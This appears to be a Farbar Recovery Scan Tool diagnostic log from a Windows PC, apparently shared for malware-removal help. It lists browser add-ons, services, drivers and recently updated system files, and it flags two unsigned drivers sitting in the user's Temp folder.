Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-06-12] (Microsoft Corporation)

FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-06-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-08-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-08-19] (Google Inc.)

Chrome:
=======
CHR Profile: C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default [2018-08-19]
CHR Extension: (Slides) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-08-19]
CHR Extension: (Docs) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-08-19]
CHR Extension: (Google Drive) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-08-19]
CHR Extension: (YouTube) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-08-19]
CHR Extension: (Google Docs Offline) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-08-19]
CHR Extension: (Gmail) - C:\Users\Christopher&Gabriell\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-08-19]

Opera:
=======
OPR Session Restore: -> is enabled.

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-09-15] (Advanced Micro Devices, Inc.) [File not signed]
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-04] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [333688 2018-06-13] (HP Inc.)
R2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2451456 2012-07-13] (Realsil Microelectronics Inc.) [File not signed]
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6541008 2018-05-09] (Malwarebytes)
S3 SandraAgentSrv; C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\RpcAgentSrv.exe [136192 2018-05-21] (SiSoftware) [File not signed]
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-04-28] (Synaptics Incorporated)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1809.2-0\NisSrv.exe [3847376 2018-09-25] (Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1809.2-0\MsMpEng.exe [114200 2018-09-25] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 ALSysIO; C:\Users\Christopher&Gabriell\AppData\Local\Temp\ALSysIO64.sys [46384 2018-10-10] (Arthur Liberman) <==== ATTENTION
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [21160 2012-09-22] (Advanced Micro Devices, Inc.)
R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 APXACC; C:\WINDOWS\system32\DRIVERS\appexDrv.sys [228032 2014-08-08] (AppEx Networks Corporation)
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [111112 2017-11-17] (Advanced Micro Devices)
R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-29] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [604160 2018-04-11] (Realtek )
S3 SANDRA; C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\WNt600x64\Sandra.sys [23112 2009-08-07] (SiSoftware)
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46184 2018-09-25] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [352424 2018-09-25] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [60584 2018-09-25] (Microsoft Corporation)
R3 WirelessButtonDriver64; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [34944 2018-05-11] (HP)
S0 sxupg; System32\drivers\iahngrmp.sys [X]
S1 xcumk; \??\C:\Users\CHRIST~1\AppData\Local\Temp\lmhxicru.sys [X] <==== ATTENTION

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-10 18:41 - 2018-10-10 18:42 - 000012615 _____ C:\Users\Christopher&Gabriell\Desktop\FRST.txt
2018-10-10 18:41 - 2018-10-10 18:41 - 000000000 ____D C:\FRST
2018-10-10 18:40 - 2018-10-10 18:40 - 000001599 _____ C:\Users\Christopher&Gabriell\Desktop\AdwCleaner[C01].txt
2018-10-10 18:14 - 2018-10-10 18:14 - 002414592 _____ (Farbar) C:\Users\Christopher&Gabriell\Desktop\FRST64.exe
2018-10-10 18:13 - 2018-10-10 18:14 - 007567568 _____ (Malwarebytes) C:\Users\Christopher&Gabriell\Desktop\AdwCleaner.exe
2018-10-10 04:58 - 2018-10-10 04:58 - 000018636 _____ C:\Users\Christopher&Gabriell\Documents\total army.xlsx
2018-10-10 04:05 - 2018-10-10 04:05 - 000001158 _____ C:\Users\Christopher&Gabriell\Desktop\Notepad.lnk
2018-10-10 00:59 - 2018-09-20 23:11 - 000753056 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2018-10-10 00:59 - 2018-09-20 23:08 - 004404720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2018-10-10 00:59 - 2018-09-20 23:08 - 000709936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2018-10-10 00:59 - 2018-09-20 23:08 - 000170808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2018-10-10 00:59 - 2018-09-20 23:07 - 000604664 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2018-10-10 00:59 - 2018-09-20 22:43 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2018-10-10 00:59 - 2018-09-20 22:42 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2018-10-10 00:59 - 2018-09-20 22:41 - 003396096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2018-10-10 00:59 - 2018-09-20 22:40 - 002368000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2018-10-10 00:59 - 2018-09-20 22:39 - 003320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2018-10-10 00:59 - 2018-09-20 22:39 - 001535488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2018-10-10 00:59 - 2018-09-20 22:38 - 002172928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2018-10-10 00:59 - 2018-09-20 22:38 - 001551360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2018-10-10 00:59 - 2018-09-20 22:37 - 001211904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2018-10-10 00:59 - 2018-09-20 22:36 - 001159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2018-10-10 00:59 - 2018-09-20 22:36 - 001034240 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2018-10-10 00:59 - 2018-09-20 22:36 - 000505344 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2018-10-10 00:59 - 2018-09-20 04:22 - 013572096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2018-10-10 00:59 - 2018-09-19 23:29 - 006569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2018-10-10 00:59 - 2018-09-19 23:10 - 001221128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2018-10-10 00:59 - 2018-09-19 23:10 - 001029432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2018-10-10 00:59 - 2018-09-19 23:10 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 009089848 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2018-10-10 00:59 - 2018-09-19 23:09 - 007520096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 007432136 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 002825232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 002462888 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 002421248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 000885952 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2018-10-10 00:59 - 2018-09-19 23:09 - 000793088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2018-10-10 00:59 - 2018-09-19 23:09 - 000412984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2018-10-10 00:59 - 2018-09-19 22:53 - 025851392 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2018-10-10 00:59 - 2018-09-19 22:46 - 022715392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2018-10-10 00:59 - 2018-09-19 22:44 - 008188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2018-10-10 00:59 - 2018-09-19 22:44 - 004383744 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2018-10-10 00:59 - 2018-09-19 22:41 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2018-10-10 00:59 - 2018-09-19 22:40 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2018-10-10 00:59 - 2018-09-08 03:07 - 002868536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2018-10-10 00:59 - 2018-09-08 02:38 - 000836608 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2018-10-10 00:59 - 2018-09-07 22:58 - 000376120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2018-10-10 00:59 - 2018-09-07 22:57 - 000267576 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2018-10-10 00:59 - 2018-09-07 22:31 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2018-10-10 00:59 - 2018-09-07 22:29 - 004771840 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2018-10-10 00:59 - 2018-09-07 22:29 - 000358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\exfat.sys
2018-10-10 00:59 - 2018-09-07 22:27 - 003348992 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2018-10-10 00:59 - 2018-09-07 22:27 - 000596992 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2018-10-10 00:59 - 2018-09-07 22:26 - 000814592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2018-10-10 00:59 - 2018-09-07 22:24 - 001457664 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2018-10-10 00:59 - 2018-08-02 22:38 - 000158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\vertdll.dll
2018-10-10 00:58 - 2018-09-21 04:18 - 021386888 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2018-10-10 00:58 - 2018-09-21 04:01 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\itss.dll
2018-10-10 00:58 - 2018-09-21 03:22 - 020381784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2018-10-10 00:58 - 2018-09-21 03:12 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\itss.dll
2018-10-10 00:58 - 2018-09-20 23:14 - 000661056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2018-10-10 00:58 - 2018-09-20 23:13 - 000480568 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2018-10-10 00:58 - 2018-09-20 23:12 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2018-10-10 00:58 - 2018-09-20 23:09 - 004790160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2018-10-10 00:58 - 2018-09-20 23:09 - 002253696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2018-10-10 00:58 - 2018-09-20 23:09 - 001427968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2018-10-10 00:58 - 2018-09-20 23:09 - 001062920 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2018-10-10 00:58 - 2018-09-20 23:09 - 000129088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2018-10-10 00:58 - 2018-09-20 23:08 - 002765344 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2018-10-10 00:58 - 2018-09-20 23:08 - 001566720 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2018-10-10 00:58 - 2018-09-20 23:08 - 001456720 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2018-10-10 00:58 - 2018-09-20 23:08 - 001257864 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2018-10-10 00:58 - 2018-09-20 23:08 - 001140672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2018-10-10 00:58 - 2018-09-20 23:08 - 000982600 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2018-10-10 00:58 - 2018-09-20 23:08 - 000261008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2018-10-10 00:58 - 2018-09-20 22:58 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2018-10-10 00:58 - 2018-09-20 22:57 - 002900992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2018-10-10 00:58 - 2018-09-20 22:57 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2018-10-10 00:58 - 2018-09-20 22:56 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2018-10-10 00:58 - 2018-09-20 22:54 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2018-10-10 00:58 - 2018-09-20 22:53 - 001006080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2018-10-10 00:58 - 2018-09-20 22:39 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2018-10-10 00:58 - 2018-09-20 22:39 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2018-10-10 00:58 - 2018-09-20 22:37 - 002904064 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2018-10-10 00:58 - 2018-09-20 22:37 - 002236928 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2018-10-10 00:58 - 2018-09-20 22:37 - 000604160 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2018-10-10 00:58 - 2018-09-20 22:36 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2018-10-10 00:58 - 2018-09-20 22:36 - 000401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2018-10-10 00:58 - 2018-09-20 04:40 - 000348160 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2018-10-10 00:58 - 2018-09-20 04:37 - 001634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2018-10-10 00:58 - 2018-09-20 04:23 - 006602240 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2018-10-10 00:58 - 2018-09-20 04:19 - 001121792 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2018-10-10 00:58 - 2018-09-20 04:18 - 003649024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2018-10-10 00:58 - 2018-09-20 04:18 - 000392192 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2018-10-10 00:58 - 2018-09-20 04:17 - 002874368 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2018-10-10 00:58 - 2018-09-20 04:17 - 001856000 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2018-10-10 00:58 - 2018-09-20 04:17 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2018-10-10 00:58 - 2018-09-20 04:16 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpshell.dll
2018-10-10 00:58 - 2018-09-20 03:46 - 001454440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2018-10-10 00:58 - 2018-09-20 03:35 - 005669888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2018-10-10 00:58 - 2018-09-20 03:34 - 012500992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2018-10-10 00:58 - 2018-09-20 03:30 - 000344576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2018-10-10 00:58 - 2018-09-20 03:29 - 002891776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2018-10-10 00:58 - 2018-09-20 03:29 - 002824704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2018-10-10 00:58 - 2018-09-20 03:29 - 001586176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2018-10-10 00:58 - 2018-09-20 03:28 - 000102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpshell.dll
2018-10-10 00:58 - 2018-09-20 01:43 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll
2018-10-10 00:58 - 2018-09-20 00:52 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MixedRealityCapture.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 006039368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 001989232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 001513032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2018-10-10 00:58 - 2018-09-19 23:29 - 000357056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2018-10-10 00:58 - 2018-09-19 23:28 - 001129544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2018-10-10 00:58 - 2018-09-19 23:28 - 000581792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2018-10-10 00:58 - 2018-09-19 23:28 - 000567256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2018-10-10 00:58 - 2018-09-19 23:21 - 022013440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2018-10-10 00:58 - 2018-09-19 23:17 - 006661632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2018-10-10 00:58 - 2018-09-19 23:15 - 019404288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2018-10-10 00:58 - 2018-09-19 23:13 - 003711488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2018-10-10 00:58 - 2018-09-19 23:12 - 000272200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SgrmEnclave.dll
2018-10-10 00:58 - 2018-09-19 23:12 - 000269128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SgrmEnclave_secure.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 005777920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000561152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2018-10-10 00:58 - 2018-09-19 23:11 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2018-10-10 00:58 - 2018-09-19 23:10 - 002719032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2018-10-10 00:58 - 2018-09-19 23:10 - 000566800 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2018-10-10 00:58 - 2018-09-19 23:10 - 000500536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2018-10-10 00:58 - 2018-09-19 23:10 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2018-10-10 00:58 - 2018-09-19 23:10 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 001767096 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 001097744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2018-10-10 00:58 - 2018-09-19 23:09 - 000713472 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2018-10-10 00:58 - 2018-09-19 23:08 - 004191232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2018-10-10 00:58 - 2018-09-19 23:08 - 001627648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2018-10-10 00:58 - 2018-09-19 22:43 - 000052736 _____ C:\WINDOWS\system32\runexehelper.exe
2018-10-10 00:58 - 2018-09-19 22:42 - 004866560 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2018-10-10 00:58 - 2018-09-19 22:42 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2018-10-10 00:58 - 2018-09-19 22:42 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2018-10-10 00:58 - 2018-09-19 22:41 - 007577088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2018-10-10 00:58 - 2018-09-19 22:41 - 000898560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2018-10-10 00:58 - 2018-09-19 22:41 - 000319488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2018-10-10 00:58 - 2018-09-19 22:41 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2018-10-10 00:58 - 2018-09-19 22:40 - 003090432 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2018-10-10 00:58 - 2018-09-19 22:40 - 000726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2018-10-10 00:58 - 2018-09-19 22:38 - 001724416 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll
2018-10-10 00:58 - 2018-09-19 22:38 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2018-10-10 00:58 - 2018-09-19 22:37 - 004615680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2018-10-10 00:58 - 2018-09-19 22:37 - 001804288 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2018-10-10 00:58 - 2018-09-19 22:36 - 001375232 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2018-10-10 00:58 - 2018-09-19 21:21 - 000001312 _____ C:\WINDOWS\system32\tcbres.wim
2018-10-10 00:58 - 2018-09-19 20:28 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2018-10-10 00:58 - 2018-09-08 03:12 - 000452112 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 001610552 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000792376 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000689464 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000612360 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000309560 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2018-10-10 00:58 - 2018-09-08 03:07 - 000144696 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2018-10-10 00:58 - 2018-09-08 03:07 - 000069944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2018-10-10 00:58 - 2018-09-08 03:02 - 000645112 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2018-10-10 00:58 - 2018-09-08 03:02 - 000540984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2018-10-10 00:58 - 2018-09-08 02:58 - 001639352 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2018-10-10 00:58 - 2018-09-08 02:58 - 001520744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2018-10-10 00:58 - 2018-09-08 02:57 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2018-10-10 00:58 - 2018-09-08 02:44 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdBth.dll
2018-10-10 00:58 - 2018-09-08 02:43 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
2018-10-10 00:58 - 2018-09-08 02:43 - 000047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardBi.dll
2018-10-10 00:58 - 2018-09-08 02:42 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2018-10-10 00:58 - 2018-09-08 02:42 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
